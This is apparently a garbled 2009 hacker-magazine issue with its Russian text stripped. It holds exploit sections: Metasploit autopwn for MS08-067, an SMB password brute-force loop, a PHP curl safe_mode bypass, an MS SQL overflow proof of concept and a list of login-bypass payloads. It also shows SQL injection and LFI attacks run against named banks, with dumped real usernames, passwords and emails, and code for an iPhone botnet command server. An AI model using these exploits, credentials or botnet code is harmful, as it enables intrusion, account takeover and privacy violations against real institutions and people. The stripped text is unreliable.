, VOIP SIP NGREP = GREP +
, .
,
(, ).
INFO
SCAPY
WWW.SECDEV.ORG/PROJECTS/SCAPY
: *NIX,
WINDOWS
Must-have , .
, , !

, , tracorute,
.
, : hping, nmap, arpspoof, arpsk, arping, tcpdump, tetheral, p0f ..
Scapy , , .
, , , -
, Scapy! ,
Python.
,
,
802.11, (,
ARP cache poisoning VLAN hopping) ..
, Scapy . ,
, , Wi-Fi ,
..
PACKETH
PACKETH.SOURCEFORGE.NET
*NIX, WINDOWS
info

NEMESIS

0x4553-Intercepter

(www.xakep.
ru/magazine/xa
/115/060/1.asp).
PDF-
.
NETWORK MINER, ,

GUI PACKETH
, , ,
ethernet , , ,
.
, packeth ,
.
.
.
, , (, - ) ,
(, IP MAC-).z
X 05 /125/ 09
039
>>
Easy Hack}
R0ID
SKVOZ
M0R0
/ R0ID@MAIL.RU /
/ KOMAROV@ITDEFENCE.RU /
/ M0R0@INBOX.RU /
: PHP-
:
PHP-
? :). ?
- ,
.
. . PHP- :
1. Free PHP Encoder www.freephpencoder.com
- PHP-. ; .
2. PHP LockIt! www.phplockit.com .
/IP-.
3. PHPCipher www.phpcipher.com -, , . . .
4. CNCrypto www.cn-software.com ,
.
5. CodeLock www.codelock.co.nz PHP, .
6. TrueBug PHP Obfuscator & Encoder www.truebug.com ,
.
PHP-.
.
7. Zorex PHP CryptZ www.zorex.info -. -
, .
. ,
, www.google.com :).
PHP-
- www.zorex.info:
1. , . :
<?
echo('Crypt Me');
?>
2. - www.zorex.info.
3. Zorex PHP CryptZ .
4. :
Source File
// -
Decoder Filename //
Output Zip
// ( + )
Limit to Host //
Limit to IP
// IP
040
php-
5. .
6. , :
_.php;
___.php.
7. _.php :
<? /*Script encoded using Zorex PHP CryptZ with demo
account http://zorex.info*/
$cryptz = 1; $cryptz_zlib = 1; $cryptz_fname =
basename(__FILE__); $cryptz_dpath = dirname(__
FILE__); if(!file_exists("$cryptz_dpath/cryptz1.
php")) { die(" <br>Script decoder not found
Fail to execute script!<br> <br><hr size=1><font
size=2>script encode using <a href='http://
zorex.info'>Zorex PHP CryptZ</a></font>"); }
include("$cryptz_dpath/cryptz1.php"); return; ?>
AYABf/7YTVr68+Bz6IbLQd+1PjKe21Ea+bTSIbyfnEqq5jkrzMQQTe
f+9jrvxc1c06AhMYGXFQ/78a9u/NzZAcTgY2+AzQ4fpa7gOK2S10iM
vGF2zI5VBe63vSXglOU6kaF4cJXeRl7h8+Nz+IaMXpOjDiCJ2FBXqa
PJIraKyFOa4jww2dgfR/v08j71kM0M9q8wKZLeV1Ov7ukus4uNRJCr
NTeVgh0HvPnyPv+Sy1jS4ixlkpcKEurs6G/8390JzPBua4yhNUr8q6
974I2TWMG8eSaJ2EYa+d7oNaeDyGCQligw1IxaQPHo7zT/zsMOm/kw
MdvDURr5r60jtLbIeM+mehSVgA4cofO8KLnN2h2S62h1zpkUc7eho2
f3nYFAga56KtbPUErw6aY+9YCLDP+9cTKS1ldRtOTgKPWKkECctzQt
lc1ZWvDo4z+7ytAcm6txeZmLG1Dl5ew+ptSVEMrseHCcplpN/aS6ZJ
aGmlzPtnliuJ4PP9GhwCLy7+gw9f1kZYo=
, .
8. .
- PHP-.
.
X 05 /125/ 09
>>
: ,
PHP-
:

PHP-. ,
: ,
. PCLs PHPiD, .
PHP-
20 , :
:
TrueBug PHP Encoder 1.0.2 (incl. GZIP), 1.0.3/1.0.4
NuSphere NuCoder
Zend Encoder / Zend SafeGuard Suite
ByteRun Protector for PHP
SourceCop (incl. protection module)
CodeLock (incl. protection module)
SourceGuardian for PHP
PHPCipher
phpSHIELD
CNCrypto
PHTML Encoder
ionCube PHP Encoder
PHP LockIt! 1.8, 2.0 (incl. GZIP)
Obfusc (Basic/Normal, ShowObfuscate)
Zorex PHP CryptZ (incl. protection module)
gencoder
DWebEncoder
Free PHP Encoder
PHP Compact
TrueBug PHP Obfuscator 1.1
PHPCoder / eAccelerator
:
Semantic Designs Obfuscator
PHP Defender
PHP LockIt! (Obfuscation mode)
Raizlabs PHP Obfuscator
POBS PHP Obfuscator
/ php-
:
1. PCLs PHPiD .
2. phpid.exe.
4. , :
<?php
define("_ENCRYPTED_CODE_", "eG1mJUIwJUE1JTk4UCUyRnQlN0
UlMUM4dEslQkUlQ0ZXJUM4JTExJUIzTg==");
define("_ENCRYPTOR_KEY_", "cfcd208495d565ef66e7dff9f98
764da");
define("_DECODER_PATH_", "decoder.php"); //You can
change this path to point to the decoder file in another
location.
if(file_exists(_DECODER_PATH_)){include_once(_DECODER_
PATH_);}
else{echoDecoder file does not exist";} // Relative or
absolute path to the decoder file
?>
5. : Free PHP Encoder www.www.freephpencoder.

com. , : , :).
P.S. ,
1 , .
: VISA/STERCARD

:

. , . . , :
1. VISA. , !
2. .
, , .
.
, ( ,
).
.
3. .
X 05 /125/ 09
VISA/STERCARD

MasterCard Visa ( ).
041
>>
, .
4. ,
, ,
.
5. (BIN), , .
BIN !
6. V (
). /.
7. B (,
VISA). , ,
.
8. , ,
, !
, ,
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\ProfileList\<current_profile_id>\ProfileImagePath . <current_profile_id>
ProfileImagePath, %SYSTEMDRIVE%\
Documents and Settings\<__>.
4. . .
. ,
, . .
: WINXP/2003
:
, ,
(
metasploit framework
).

.

%SYSTEMDRIVE%\Documents and Settings\<__>, :
1. . , ,
.
.
2. . %SYSTEMDRIVE%\Documents and
Settings\<__> :

. ,
, (%SYSTEMDRIVE%\
Documents and Settings\< >).
.
3. . -
: CONFICKER (RU.
WIKIPEDIA.ORG/WIKI/CONFICKER) ,
. ?
:
1. NMAP.
. , NMAP SE
. :
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns
--script-args safe=1 192.168.111.0/24,
script , ,
NMAP (Nmap 4.85BETA7).
pn Domain Name Resolution (DNR).
n .

.
042
:
nmap -sC -PN -d -p445 -n -T4 --min-hostgroup 256 --minparallelism 64 --script=smb-check-vulns --scriptargs=safe=1 10.0.0.0/8
-
139 445 TCP.
Conficker: Likely CLEAN Conficker: Likely INFECTED.
2. nGREP. ngrep , , payloads
( , ). Conficker

:
ngrep -qd eth0 -W single -s 900 -X
0xe8ffffffffc25f8d4f108031c4416681394d5375f538aec69da0
4f85ea4f84c84f84d84fc44f9ccc497365c4c4c42cedc4c4c49426
3c4f38923bd3574702c32cdcc4c4c4f71696964f08a203c5bcea95
3bb3c096969592963bf33b24699592514f8ff84f88cfbcc70ff732
49d077c795e44fd6c717cbc404cb7b040504c3f6c68644fec4b131
X 05 /125/ 09
>>
, CVSSv2, Conficker
(Critical / CVSS Base Score : 10.0).
:
)
/opt/nessus/bin/nessus-fetch check
nessus-fetch is properly configured to receive a
Professional feed
/opt/nessus/sbin/nessus-update-plugins
) 36036 .
NMAP Conficker
ff01b0c282ffb5dcb61f4f95e0c717cb73d0b64f85d8c7074fc054
c7079a9d07a4664eb2e244680cb1b6a8a9abaac45de7991dacb0b0
b4feebeb 'tcp port 445
and dst net 127.0.208.0/24'

- , ngrep.
3. Nessus.
. (nessus.org/plugins/index.
php?view=single&id=36036),
. , ,
: METASPLOIT ?
:
:).
( ) .

, Metasploit .
.
1. sqlite3:
msf > load db_sqlite3[*] Successfully loaded plugin:
db_sqlite3
2. :
4. .
) ,
. iv.cs.uni-bonn.
de/wg/cs/applications/containing-conficker.
) $ ./scs2.py 10.0.0.1 10.0.0.5:
Simple Conficker Scanner v2 (C) Felix Leder, Tillmann
Werner 2009
[UNKNOWN] 10.0.0.1: No response from port 445/tcp.
[UNKNOWN] 10.0.0.2: Unable to run NetpwPathCanonicalize.
[CLEAN] 10.0.0.3: Windows Server 2003 R2 3790 Service
Pack 2 [Windows Server 2003 R2 5.2]: Seems to be clean.
[INFECTED] 10.0.0.4: Windows 5.1 [Windows 2000 LAN
Manager]: Seems to be infected by Conficker D.
[INFECTED] 10.0.0.5: Windows 5.1 [Windows 2000 LAN
Manager]: Seems to be infected by Conficker B or C. Done
3. .
msf > db_create[*] The specified database

already exists, connecting[*] Successfully
connected to the database[*] File: /root/.
msf3/sqlite3.db

NMAPa :
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.
CCC.0/24
3. ms08-067:
msf > db_autopwn -e -p -b -m ms08_067
P.S.
msf > sessions l.
7
:

:
1. . , 100 , . passwords.txt.
2. cmd.exe .
FOR /F "tokens=1*" %i in (passwords.txt) do net use
\\192.168.1.1\IPC$ %i /u:Administrator
X 05 /125/ 09
3. .
P.S. .
. z
043
>>
SKVOZ
,
. .
XSS 5000
.. STABLE- Linux
, CISCO ASA/
PIX TCP-, PHP 5.2.9
safe_mode open_basedir. ? ,
. Microsoft 8 ,
(MS09-009, MS09-010, MS09-013, MS09-014, MS09-011).
01
PHP 5.2.9
>> Brief
safe_mode open_basedir (,
,
-). , libcurl, PHP. Curl

-

. :
curl_setopt($ch, CURLOPT_URL, file:file:////etc/passwd);
. Curl safe_mod/open_basedir
file:////etc/passwd. ,
./file:/etc/passwd, . ,
file:////etc/
passwd ( /etc/passwd).
.
>> Targets:
php 5.2.9
044
>> Exploit

SecurityReason (securityreason.com/achievement_exploitalert/11) . ,
(file: ):
./file:/
./file:/etc/
./file:/etc/passwd/
:
#!/bin/sh
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"file:file:////etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
X 05 /125/ 09
>> Solution
. PHP
.
02
LINUX ( EXIT_
NOTIFY())
>> Brief

( suid).
; (capabilities). ,
- : RAW-, ,
, . ,
, (
).

Linux:
CAP_SETUID root
,
CAP_SETGID root
, .
, , httpd, sendmail, postfix, ftpd,
safe_finger
CAP_HIDDEN
.
CAP_INIT_KILL - init.
CAP_SYS_CHROOT
shell
CAP_FSETID / SUID
SGID (
root)
- .
, LIDS (Linux Intrusion
Detection System). ,
(
grsecurity, z).
LIDS , ( Linux)
,
, roota. , root-, ,
. , ,
, .
, , . , ,

( CAP_SYS_BOOT).
.
LIDS
, . CAP_KILL
root
, ,
. exit_
notify() (linux/kernel/exit.c).
setuid. , X 05 /125/ 09
>>
SIGCHLD (, , ).
Design error ( ).
>> Exploit
, , www.
xakep.ru/post/47784/Linux-Kernel-Local-Privilege-EscalationExploit.txt.
>> Targets:
Linux kernel <2.6.29,
, Trustix Secure
Enterprise Linux 2.0, Trustix Secure Linux 2.2, Trustix Secure Linux 2.1 ,
Trustix Secure Linux 2.0. Linux kernel 2.6.29 -git14.
>> Solution

:
diff --git a/kernel/exit.c
b/kernel/exit.c
index 6686ed1..32cbf26
100644 (file)
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -837,8 +837,7 @@ static void exit_notify(struct task_
struct *tsk, int group_dead)
*/
if (tsk->exit_signal != SIGCHLD && !task_
detached(tsk) &&
(tsk->parent_exec_id != tsk->real_parent->self_
exec_id ||
tsk->self_exec_id != tsk->parent_exec_id) &&
!capable(CAP_KILL))
+
tsk->self_exec_id != tsk->parent_exec_id))
tsk->exit_signal = SIGCHLD;
signal = tracehook_notify_death(tsk, &cookie,
group_dead);
http://patchwork.kernel.org/patch/16544/
03

ORACLE APEX
>> Brief
APEX Oracle, Oracle HTMLDB, WEB-
. , Safe Mode , cURL .

045
>>
Linux man
Oracle, Apache WEB-

Oracle Database (Express Edition, )
Embedded PL/SQL Gateway (EPG).
,

, .
>> Exploit
. Oracle
sqlplus (oracle.com/technology/tech/sql_plus/index.
html).
#
sqlplus login/pass
# ,

SQL> select granted_role from user_role_privs;
# , APEX
SQL> select owner,table_name from all_tables where
owner='FLOWS_030000';
OWNER TABLE_NAME
----------------------------------------------------------FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE
# , Password
SQL> select owner||'.'||table_name||'.'||column_name
from all_tab_columns where column_name like '%PASSWORD%'
and owner like '%FLOWS_0300%';
OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
-----------------------------------------------------FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
046
Oracle APEX
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE
#
SQL> select user_name,web_password2 from FLOWS_030000.
WWV_FLOW_USERS
USER_NAME WEB_PASSWORD2
-----------------------------------------------------YURI 141FA790354FB6C72802FDEA86353F31

Repscan.
>> Targets
Oracle APEX.
>> Solution
Oracle CPU
April 2009.
04
MS SQL
SERVER SP_REPLWRITETOVARBIN
>> Brief:
MS SQL Server.

,
.
>> Targets
: Microsoft SQL Server 2000 SP4, 8.00.2050,
8.00.2039 , SQL Server 2000 Desktop Engine
(MSDE 2000) SP4; SQL Server 2005 SP2 (+9.00.1399.06 ), SQL
Server 2000 Desktop Engine (WMSDE).
>> Exploits
ASP-,
,
,
X 05 /125/ 09
>>
sqlplus Oracle

. ,
, .

. ,
, T-SQL:
EXECUTE master.dbo.SP_DROPEXTENDEDPROC 'sp_
replwritetovarbin'
. ,
:
use [master]
GO
REVOKE EXECUTE ON [sys].[sp_replwritetovarbin] TO
[public]
GO
T-SQL:
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
@end_offset output,
@vb_buffer output,
@vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < 3000
BEGIN
SET @counter = @counter + 1
SET @buf = @buf + @val
END
SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''
EXEC master..sp_executesql @buf
X 05 /125/ 09
, , , 0x41414141.
>> Solution
MS SQL Server 2008. , Microsoft
MS09-004
(microsoft.com/technet/security/advisory/961040.mspx), .
(Removing
an Extended Stored Procedure from SQL Server msdn.microsoft.com/
en-us/library/aa215995(SQL.80).aspx).
05
ESET NOD32
>> Brief:
. ,
,
. Kaspersky Internet Security (kl1.sys), Defence Wall
(dwall.sys), Avira Premium Security (avgntflt.sys), BitDefender Total
Security 2009 (bdfndisf.sys), ZoneAlarm Security Suite (srescan.sys),
Panda Global Protection 2009 (APPFLT.SYS), Internet Security 2009 (fsdfw.
sys). IOCTL - (
, PGP).
.
(RAR, ZIP, LHA ..).

, - .
.
. , ,
,
.
>> Exploits
, , () .
1. . ,
.
.
047
>>
s_binary("41424344");
s_block_end("somefiledata");
Microsoft 2008
4 .
4 (0x41424344). 4
ascii-.
: 4ABCD. ,

SPIKE-,
:
s_block_size_ascii_word_variable("somefiledata");
//
2. .
.
3. . . ,
, SPIKE ( 2002
). ( SPIKE)?
( , ).
SPIKE-:
s_block_size_ascii_word("somefiledata");
s_block_start("somefiledata");
F-Prot
s_block_start("somefiledata");
s_binary_variable("41424344"); //
s_block_end("somefiledata");
SPIKE (
), , , : 0, -1,4294967295,0,0x40000000,0x7fffffff
.., %n%n%n%n, \x00, ../../../../../, A . SPIKE
, , SPIKE,
0, -1, 4294967295 ..
AVG Antivirus
KIS
48
048
X 05 /125/ 09
>>
DrWeb
SPIKE . VX , , ,
,
.
NOD32 . :
Bitdefender Antivirus 2009 CAB-;
Avast! RAR-;
Fortinet .

: Zip, Zip SFX, ARJ, ARJ, SFX, TAR, GZ, ZOO,
UUEncode, TNEF, MIME, BINHEX, MSCompress, CAB, CAB SFX,
LZH, LZH SFX, LHA, RAR, RAR SFX, JAR, BZ2, Base64, Mac Binary,
ASPack, CHM, DOC, EML, EXE, FSG, HLP, PDF, Yoda, ELF, PPT,
OPD.
- F-Pot ZIP-.
, ,
F-Pot (E-mail Gateway scanner, ),
,
Attachment not scanned.
>> Targets
ESET Smart Security 4
ESET NOD32 Antivirus 4
ESET Smart Security 4 Business Edition
ESET NOD32 Antivirus 4 Business Edition
ESET NOD32 Antivirus for Exchange Server
ESET Mail Security
ESET NOD32 Antivirus for Lotus Domino Server
ESET File Security
ESET Novell Netware
ESET DELL STORAGE SERVERS
ESET NOD32 Antivirus for Linux gateway devices
>> Solution
(blog.zoller.lu),
. , ESET
( 14 eset.
com/support/updates.php?pageno=3),
SDL . z
X 05 /125/ 09
49
>>
NONAME

? , .
?
,
PCI DSS, . ?
!
>>

. -
-
. .
- (,
),
, ,
,
.
050
: STATEBANK1898.
COM ()
,

-
(ATM,
).
,
:
http://www.statebank1898.com/
search.asp?q=1&txtSearch=%27%22%3E
%3C%2Ftitle%3E%3Cscript%3Ealert(13
37)%3C%2Fscript%3E%3E%3Cmarquee%3E
%3Ch1%3EXSS+by+skvz%3C%2Fh1%3E%3C%
2Fmarquee%3E&x=18&y=15
X 05 /125/ 09
>>
, . IP
,
.
, , , .

(XSS-
+ IE8, NoScript Mozilla, JS).
- .
, SQL-injection
:
http://www.statebank1898.com/news.
asp?id=6'
Microsoft OLE DB Provider for ODBC
Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver]
[mysqld-5.1.30-community]You
have an error in your SQL syntax;
check the manual that corresponds
to your MySQL server version for
the right syntax to use near
ORDER BY post_date DESC,id DESC
at line 1
/news.asp, line 54
. : ONLINE_BANKING,
USERS
statebank1898.com/news.asp?id
=6+AND+1=2+UNION+SELECT+0,tabl
e_name,2,3,4,5,6+from+information_
schema.tables+WHERE+table_
schema=%27sbthappyrudie%27
: zipcode, users, uploads_navfile, uploads,

states, rate_watch, press, online_banking, master,
faq_category, faq, custom, content, branch, banners.
:
statebank1898.com/news.asp?id=
6+AND+1=2+UNION+SELECT+0,colum
n_name,2,3,4,5,6+from+information_
schema.columns+WHERE+table_
name=%27online_banking%27
: sort_order, logon_url, id, active,

account.
statebank1898.com/news.asp?id=
6+AND+1=2+UNION+SELECT+0,colum
n_name,2,3,4,5,6+from+information_
schema.columns+WHERE+table_
name=%27users%27
:
statebank1898.com/news.asp?id=6+A
ND+1=2+UNION+SELECT+0,user(),2,3,
4,5,6
sbthappyrudie@208.109.78.117
, - ,
(64.202.178.162). ,
, (443-ssl, 21-ftp):
statebank1898.com/news.asp?id=6+AN
D+1=2+UNION+SELECT+0,database(),2,
3,4,5,6
: username, password, id, full_name,

form_enrollment, form_contact, email, active.
. ,
, ,
.

:
statebank1898.com/news.asp?id=6+AN
D+1=2+UNION+SELECT+0,concat(userna
me,0x20,password,%20id,0x20,full_
name,0x20,form_enrollment,0x20,form_
contact,0x20,email,0x20,active),2,3,
4,5,6+from+users
:
sbthappyrudie.
,
, :
X 05 /125/ 09
johnny k8vt9~;3 Johnny Withers 0 0

johnny@pixelated.net 1
enrollment mvzwttumv|6 Online

Enrollment 1 0 Business.Online@
StateBank1898.com 0
kwv|ik|5 Contact Us 0 1 NetTeller@
statebank1898.com 0
admin Oqjjm{[us{9@A@4 Admin 0 0
jlott@gibbes.net 1
-,
.
.
: UNIBANKHAITI.COM
()
,
. . ,
, , . ,

, .
unibankhaiti.com/actualites/index.
php?id_article=464+AND+1=2+UNION+SE
LECT+0,CONCAT(0x7873716C696E6A6265
67696E,(SELECT+CONCAT_ws(0x3a3a,%20
table_name,version())+FROM+informati
on_schema.tables),0x7873716C696E6A65
6E64),0x71),0x71),2,3,4,5,6,7,8,9-
,
, 5 :
: uniban2_DB
[Table: Columns]
[0]statistiques: id,username,type_a
ction,date,heure,page,ip,host,navi
gateur,referer
[1]succursales: id,statut,nom,desc
ription,adresse,directeur,telephon
e,fax,reseau,inauguration,horaire,
services
[2]taffiches:
ID,source,lien,debut,fin,place
[3]tagences: id,statut,nom,descript
051
>>

EMPLOYER LOGIN. IP

SQL-INJECTION
.
(ONLINE ENROLLMENT),
-
, ,

ion,adresse,directeur,telephone,fax,reseau,inauguratio
n,horaire,services
[4]tannonces: annonceID,image,titre,libelle,date,pos
te_par,actif
[5]tasctuces: AstuceID,titre,accroche,contenu,modifi
e_par,modifie_le,actif
[6]tcatfaq: id_cat,categorie
[7]temploi: id_article,image,date,titre,accroche,conte
nu,expirdate,ecritpar,postepar,actif
[8]tfaq: id_faq,id_cat,question,reponse
[9]tnews: id_article,image,date,titre,accroche,contenu
,expirdate,ecritpar,postepar,actif
[10]tsuccursales: id,statut,nom,description,adresse,d
Pros & Cons

SQL-injection
,
. ,
, . SQL
Injection Pentesting Tool (SIPT) ,

LIMIT , .
. SQLHACK,
.
052
irecteur,telephone,fax,reseau,inauguration,horaire,se
rvices
[11]ttaux: id,date,achat,vente,brh
[12]utilisateurs: id_utilisateur,log,pass,droits,acces!
, ,
-, ,
( 12).
[0] 1:manitou:f6812478366f92bf385d8b611152ec74:7777777
:index.php:
[1] 2:newsmaster:9ca43771207861a0dd00956bb503a95a:7777
77:admin_news.php:
[2] 3:ratemaster:dd8f54c23ee12799714d671e7e1f0e1b:0003
00:admin_succ.php:
[3] 4:ratemaster:dd8f54c23ee12799714d671e7e1f0e1b:0007
00:admin_succ.php:
[4] 5:reseau:117ba14f8471e7ec247bb0f7112ebbaf:001100:i
ndex.php:
Pangolin
, 90% -. ,
SQL-injection (MySQL,
MSSQL, Oracle, Sybase, DB2, Access, Informix, PostgreSQL, SQLite).
X 05 /125/ 09
>>

AUTHORIZATION BYPASS
[5] 6:reseau1:cb4bbcd4b4b47894a0e6d
b706fb415c2:007700:index.php:
[6] 12:drh1:841eb977300a2d84ab2ccf8f
9077f1e0:000007:index.php:index.php:
: TBCBANK.COM.GE
()
!
, , , ,
,
:
tbcbank.com.ge/ir/
main.php?lang=eng&id=80&action=1&uname=alexander.
khazaradze%40statestreet.
com&upass=xkoqma&OK=Login
, login:Alexander.kharadze@
statestreet.com, xkogma.
, -
.
CHAMBERS BANK.

SQL-INJECTION,
,
Martin:Fankhauser:Atlantic
Forfaitierungs AG:Othmarstrasse
8:8008 Zurich:NoDataInColu
mn:Switzerland:fankhauser@
atlanticforfaiting.com:
pass: atlantic
Giorgi:Kekelidze:TBC
Bank:Marjanishvili 7:tbilisi:0102
:Georgia:gkekelidze@tbcbank.com.
ge:+99532272727:+99532774772:
pass: IOio(0000
...
Tamar:Ramishvili:TBC: 0102:NoDat
aInColumn:Geo:tramishvili@gmail.
com:hkjld:hupi:
Pass:tata
: DASFLA.COM
()
, ATM-.
authorization bypass: dasfla.com/
loginscr.aspx.
:
Username: admin' or 1=1-Password: admin' or 1=1-
! We are in! :
Data Access Systems, Inc. User: Super
Administrator.
: ABCDELABANCA.
COM ()
, ?
tbcbank.com.ge/ir/main.php?id=20+A
ND+1=2+UNION+SELECT+0,1,2,3tbcbank.com.ge/ir/main.php?id=20+A
ND+1=2+UNION+SELECT+0,concat_ws(t_
user,0x20,t_pass),2,3+from+t_users

(admin:budianduk>) t_users tbcbank.com.ge/ir/admin/index.php.
t_users:
X 05 /125/ 09
http://www.abcdelabanca.com/admin/
pages/frm_login.php
:
user: x' AND email IS NULL; -pass : x' AND email IS NULL; --
! ?
, , ,
:
or'1'=1'or'1'='1',
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1admin' or 1=1 admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)-admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
: PRIVATBANK.UA
()
https://blog.privatbank.ua/
lib/request/choice_of_goods.php
:
053
>>
! -
AUTHORIZATION BYPASS

ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8]

Accept[text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8]
Accept-Language[ru,en-us;q=0.7,en;q=0.3]
Accept-Encoding[gzip,deflate]
Accept-Charset[windows-1251,utf-8;q=0.7,*;q=0.7]
Keep-Alive[300]
Connection[keep-alive]
Cookie[language=../../../../../../../../etc/passwd%00]
Cache-Control[max-age=0]
LFI COOKIE
, , LFI , , httpd.conf / php.ini.

.

- :
http://www.privatbank.ua:8085/info/index3.stm
XML:

: https://blog.privatbank.ua/lib/request/choice_
of_goods.php
2, 1:<table class="goods" cellspacing="0"
cellpadding="5" border="0">
HTTP- ( Tamper
Data) , language. LFI cookie:
# cookie
language=../../../../../../../../etc/passwd%00
#
Tamper Data, . : Mozilla

. , , :
Host[blog.privatbank.ua]
User-Agent[Mozilla/5.0 (Windows; U; Windows NT 5.1;
054
, EAServer 5.5 Release. ,

:
A vulnerability has been discovered in Sybase EAServer.
If exploited,
this can result in user-specified code being executed
under the security context of the
jagsrv.exe process. To complete this attack, you must be
authenticated
to /WebConsole/. By default, the jagadmin user password
is set to blank so getting access
might be trivial. After authenticating to /WebConsole/
if an attacker sets the value of
the JavaScript parameter in TreeAction.do to a large
value a return address can be
overwritten due to a stack-based buffer overflow
, Authorization bypass jagadmin

.z
X 05 /125/ 09
>>
D0ZNP
/ HTTP://OXOD.RU /
IPHONE-
, . GSM 3g,
Wi-Fi , . .
-, Apple iPhone.
>>

.
:
1. IP- (,
, ).
2. ( ,
1 /).
3. GSM
(, SMS).
4. .
5. .
6.
( , -,
, .).
7. SMS.
8. GSM
056
GPS ( ).
9.
( ).

, , ,
. , . ,
.

-.
( , )

.
-
HTTP.
. PHP
SQLite Windows. ,
.
, SQL,

- .
IP-,
IMEI
, . ,

. IMEI
, ,
, . IMEI
X 05 /125/ 09
>>

.
( ).
IMEI iPhone
( ):
www.iclarified.com/entry/index.
php?enid=657.
,
IMEI . ,

. -,
+7-(123)-456-78-90.
SMS , -
.

- ( )
(
).
, ,
. ,
,
, .
,
()
() .
- , ,
.
. SQLite,
(
).
,

( , )
SQLite ,
- .

. PHP
Windows.
php.ini :
[PHP_SQLITE]
extension=php_pdo.dll
extension=php_pdo_sqlite.dll
extension=php_sqlite.dll
X 05 /125/ 09
ext .
,

. SQL-:
CREATE TABLE zombies (id INTEGER
PRIMARY KEY, imei INTEGER, number
INTEG
ER, infect_date DATETIME, last_
active_date DATETIME, alias
VARCHAR(64), comment VARCHAR(
1024));
//
.
CREATE TABLE commands (id INTEGER
PRIMARY KEY, cmd VCHAR(128), created
DATETIME, accepted INTEGER);
// ,

().
CREATE TABLE spec_commands
(id INTEGER PRIMARY KEY, cmd
VARCHAR(128), imei INTEGER, created
DATETIME, accepted INTEGER);
// ,
IMEI.
, , , MySQL 15
IMEI INTEGER, SQL
.
,
,
.
,

http- GET- IMEI . , , ,
.
,
- .
, IMEI,
. , .
,
:
function checkVkey($imei, $vkey)

{
$result = false;
if (strlen($imei)==15)
{
$cb1 = $imei[3];
$cb2 = $imei[7];
$cb3 = $imei[8];
$cb4 = $imei[11];
$cb5 = $imei[13];
$tkey = ($cb1*101+$cb2*107+$cb3*
3+$cb4*9+$cb5*71);
if ($tkey==$vkey)
{
$result=true;
}
}
return $result;
}
.
addToZombie:
function addToZombie($imei,
$number)
{
if (strlen($imei)==15)
{
try {
$dbHandle = new SQLiteDatabase(
"master-server.db");
if (strlen($number)==0)
$number="NULL";
@$dbHandle->queryExec(
"insert into zombies
values((select max(id)+1 from
zombies),".$imei.", ".$number.",
DATETIME('now'), NULL, '','')");
return true;
}
catch( Exception $exception )
{
die($exception->getMessage());
return false;
}
}
}

reg.php. -
057
>>
. ,
IPHONE
http-
URL:
{
}
http://master-server.com/reg.php?imei=123456789012345
&vkey=1589.

. :
, ( ID) HTTP
response. zombies,
, ,
. :
function showCommand()
{
try
{
$dbHandle = new SQLiteDatabase("master-server.db");
$sqlGetView = "SELECT * FROM commands where id in
(select max(id) from commands)";
$result = $dbHandle->query($sqlGetView);
, , :
http://master-server.com/take.php?
imei=123456789012345.
, special_commands
IMEI:
function showSpecCommand($imei)
{
try
{
$dbHandle = new SQLiteDatabase("master-server.db");
$sqlGetView = "SELECT * FROM spec_commands where id in
(select max(id) from spec_commands where imei=".$imei.");
$pageView = $result->fetch();
echo $pageView[1];
}
echo $pageView[1];
{
}
}
{
}
}
function updateActivity($imei)
{
try
{
$dbHandle = new SQLiteDatabase(master-server.db");
$sqlGetView = "UPDATE zombies SET last_active_
date=DATETIME('now') WHERE imei=".$imei;
, .
, . ,
. sqlite.exe, 15 -. ,
, :).
HTML-.
, ,
058
X 05 /125/ 09
>>
{

( last_active_
date zombies), , .
.
:
function showZombies()
{
try
{
$dbHandle = new SQLiteDatabase
("master-server.db");
if (strlen($number)==0)
$number="NULL";
echo '<tr bgcolor="'.($pageVie

w[4]?'green':'red').'"><td><inpu
t type="button" value=. "
onclick="javascript: openZombie('.$pag
eView[0].')"/></td><td>'.$pageView[0].
'</td><td>'.$pageView[1].'</
td><td> '.$pageView[2].'</td><td>'.
$pageView[3].'</td><td>' .$pageView[4]. '</
td><td><div id="changeAlias'.$pageView[0]
.'" style=display: none;"><form action=""
method="POST"><input type="hidden"
value="'.$pageView[0].'" name="id"/><input
type="text" value="'.$pageView[5].'"
